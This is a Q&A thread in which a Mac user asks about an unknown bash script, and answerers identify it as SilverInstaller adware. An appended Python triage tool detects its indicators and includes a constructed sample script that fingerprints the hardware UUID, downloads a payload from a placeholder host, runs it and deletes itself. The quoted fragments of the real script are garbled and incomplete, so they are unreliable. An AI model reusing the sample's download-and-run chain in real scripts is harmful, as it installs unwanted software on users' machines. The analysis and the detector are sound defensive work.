What is this unknown executable on my boot volume? Is it Malicious?
I noticed I had this file in the Macintosh HD folder.
And then when I click on it, it shows this:
Apparently this file was created in 2017, but I don't remember creating it.
Any idea what it could be?
Its content:

#!/bin/bash
func_4() [ "$COUNTRY" == "CA" ]
func_4 &

macos bash file malware
edited Sep 11 at 18:10 by ankii
asked Sep 10 at 20:52 by Friendly Siren
31
Double clicking (aka running the file) is not advisable since you have no idea what it does. This appears to be a shell script of some type so you should edit it and post the contents to your original question so we can see what it contains.
– Allan
Sep 10 at 21:03
3
Open it in a text editor, that is what I do. Often these are spurious files created by an app or the OS that can be deleted with no consequence. But if you are curious, peek inside and see what it says...
– Steve Chambers
Sep 10 at 21:03
2
If you want to do this via the terminal, just issue the command
cat file | pbcopy
and then paste it to the question. Do this from the Macintosh HD folder.
– Allan
Sep 10 at 21:04
2
So, what I was able to uncover is that the script downloads and extracts a file from premiummac.com, which is hosted on an AWS server. Issue the command
dig premiummac.com
in Terminal for the details. searchitdown seems to redirect to a google page. What you’re looking at here is some very questionable script that looks, walks, and quacks like a malware infected duck.
– Allan
Sep 10 at 21:39
8
That script downloads malware from a remote server. You need to assume it ran at some point and your system is already compromised. Don't take any chances and reinstall the machine, then change your passwords and consider all data that was in contact with the machine up to the reinstall compromised.
– André Borie
Sep 11 at 10:54
2 Answers
This is SilverInstaller, adware to download more adware and ‘potentially unwanted programs’. This was likely distributed through fake Flash popups, which someone on the system clicked on, downloaded, opened, installed and provided administrator credentials to.
Installed software in this package likely includes MacKeeper, VSearch, a Pirrit injector, BrowserEnhancer and MPlayer, all of which you most certainly don't want.
- https://www.intego.com/mac-security-blog/silverinstaller-uses-new-techniques-to-install-puapup/
- https://www.intego.com/mac-security-blog/silverinstaller-sneakier-than-previously-thought/
I'll break down the code.

#!/bin/bash

This code is a script to be interpreted by bash, noted by this shebang.

func_4() awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')

Get a unique identifier for this machine to be used later.

COUNTRY="CA"
if [ "$COUNTRY" == "AU" ]

func_4 &

Function all ready to go, time to call it.
answered Sep 10 at 21:48, edited Sep 10 at 22:19, by grg♦
4
This answers these two questions too :) stackoverflow.com/search?q=www.searchitdown.com
– ankii
Sep 10 at 22:00
3
@grg thank you so much for taking the time to both identify this and break down the code for me to understand it. Any idea what I should do to get rid of it? I already ran malware bytes on my mac
– Friendly Siren
Sep 10 at 22:49
1
@FriendlySiren you should be able to run
sudo rm /File
to get rid of the script itself. This won't remove any malware installed by it though.
– nohillside♦
Sep 11 at 13:11
4
It's pretty likely the hardcoded values (COUNTRY and CLIENT_COMP) are filled in by the server as it's sending the script. It's easier and more reliable than having the server change that code dynamically.
– Kevin
Sep 11 at 17:06
2
The good news is that two out of three payloads return server errors, and the third is non-functional without the others.
– Mark
Sep 11 at 19:54
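The answer and comments above describe what marks this script as an installer for unwanted software: hardware-UUID fingerprinting, a hardcoded country check, a download-and-run chain, a function kicked off in the background, and cleanup afterwards. The static triage tool below is an added example, not code from this thread or from any of its participants; it scans a shell script for those indicators and returns a verdict. The sample scripts, the indicator names, and the verdict thresholds are constructed for illustration; the only page-derived values are the two domains named in the comments.

```python
import re
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Finding:
    category: str   # indicator name (constructed for this example)
    line: int       # 1-based line in the scanned script
    snippet: str    # the offending line, stripped
    why: str        # what the indicator means for triage


# Indicators mirror the behaviours the thread attributes to the script.
# The two domains are the ones named in the thread; every other pattern is
# a generic one chosen for this example.
INDICATORS = [
    ("fingerprint_uuid", r"IOPlatformUUID|\bioreg\b",
     "reads the hardware UUID to fingerprint the Mac"),
    ("geo_gating", r'\[\s*"?\$\w*COUNTRY"?\s*==\s*"?[A-Z]{2}"?\s*\]',
     "branches on a hardcoded two-letter country code"),
    ("download", r"\b(?:curl|wget)\b", "fetches a remote payload"),
    ("unpack_or_exec", r"\b(?:unzip|tar|open|chmod\s+\+x)\b",
     "unpacks or launches what it fetched"),
    ("self_cleanup", r"\brm\s+-r?f\b",
     "removes its temp files or itself without prompting"),
    ("background_call", r"^\s*\w+\s*&\s*$",
     "launches a function in the background so the caller returns at once"),
    ("known_domain", r"\b(?:premiummac\.com|searchitdown\.com)\b",
     "domain named in the thread"),
]
COMPILED = [(n, re.compile(p, re.MULTILINE), w) for n, p, w in INDICATORS]


def triage(script_text: str) -> List[Finding]:
    """Return every indicator hit in the script, ordered by line."""
    lines = script_text.splitlines()
    findings = []
    for name, rx, why in COMPILED:
        for m in rx.finditer(script_text):
            line_no = script_text.count("\n", 0, m.start()) + 1
            findings.append(Finding(name, line_no, lines[line_no - 1].strip(), why))
    return sorted(findings, key=lambda f: (f.line, f.category))


def verdict(findings: List[Finding]) -> str:
    """Thresholds are constructed for this example: a single hit is noise,
    several distinct behaviours together are the download-and-run pattern."""
    distinct = {f.category for f in findings}
    if len(distinct) >= 4:
        return "likely adware/malware: fingerprint + download + run + cleanup"
    if len(distinct) >= 2:
        return "suspicious: review manually"
    return "low: no meaningful combination of indicators"


# Constructed sample shaped like the fragments quoted in the thread; not the real file.
# The payload host is a placeholder (.invalid TLD), so nothing here resolves.
SAMPLE_SCRIPT = r'''#!/bin/bash
CLIENT_COMP=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')
COUNTRY="CA"
func_4() {
    if [ "$COUNTRY" == "AU" ]; then
        exit 0
    fi
    TMPD=$(mktemp -d /tmp/inst.XXXXXX)
    curl -s -o "$TMPD/pkg.zip" "http://payload.example.invalid/pkg.zip?id=$CLIENT_COMP"
    unzip -qq "$TMPD/pkg.zip" -d "$TMPD"
    open "$TMPD/Installer.app"
    rm -rf "$TMPD"
    rm -f "$0"
}
func_4 &
'''

# Constructed benign control: one indicator alone (tar) must not raise the verdict.
BENIGN_SCRIPT = '''#!/bin/bash
tar czf "$HOME/backup-$(date +%F).tgz" "$HOME/Documents"
'''

if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        hits = triage(text)
        print(f"{label}: {verdict(hits)}")
        for f in hits:
            print(f"  line {f.line:>2} [{f.category}] {f.snippet}  <- {f.why}")
```

Run it against a copy of the file taken with cat, not by double-clicking it; the verdict is a triage aid for deciding between deleting a stray file and rebuilding the machine, not a replacement for the full cleanup the comments recommend.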
That script does everything I would expect malware to do and has been around for a while, so the domains it connects to could be blocked or shut down now.
- Downloads some files, runs those files and cleans up after itself.
It could be ad(vertising)ware instead of malware, but it’s clearly fingerprinting your Mac, reporting a unique identifier for your Mac and intending to change the state of the Mac. Unless you opted in to the tool and wanted it to run (and even if you did once), downloading and running the MalwareBytes cleaner would be my next step.
- https://www.malwarebytes.com/
answered Sep 10 at 21:35 by bmike♦
3
The output including and following 'logout' is part of Terminal's session management (/etc/bashrc_Apple_Terminal) and unrelated to the file.
– grg♦
Sep 10 at 21:03
@bmike I've run malware bytes on my mac many times, it never got rid of this file for some reason. But I'll run it again just to make sure. Thanks :)
– Friendly Siren
Sep 10 at 22:51